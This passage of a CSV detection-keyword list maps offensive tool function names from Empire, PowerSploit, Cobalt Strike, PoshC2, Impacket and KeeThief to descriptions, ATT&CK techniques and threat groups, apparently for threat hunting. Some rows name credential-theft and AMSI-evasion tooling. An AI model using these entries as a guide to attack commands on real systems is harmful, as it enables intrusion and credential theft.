signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Find-AmsiSignatures.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Find-AppLockerLogs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-AVSignature*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*findDelegation.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*findDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Find-DomainShare -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-DomainShare -CheckShareAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*findgpocomputeradmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Find-GPOComputerAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Find-GPOComputerAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*findinterestingdomainsharefile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-InterestingDomainShareFile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-InterestingDomainShareFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*find-interestingfile -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Find-InterestingFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-KeePassconfig*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-KeePassconfig*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*Find-LocalAdminAccess -Verbose*","greyware_tool_keyword","powershell","Find machine where the user has admin privs","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - 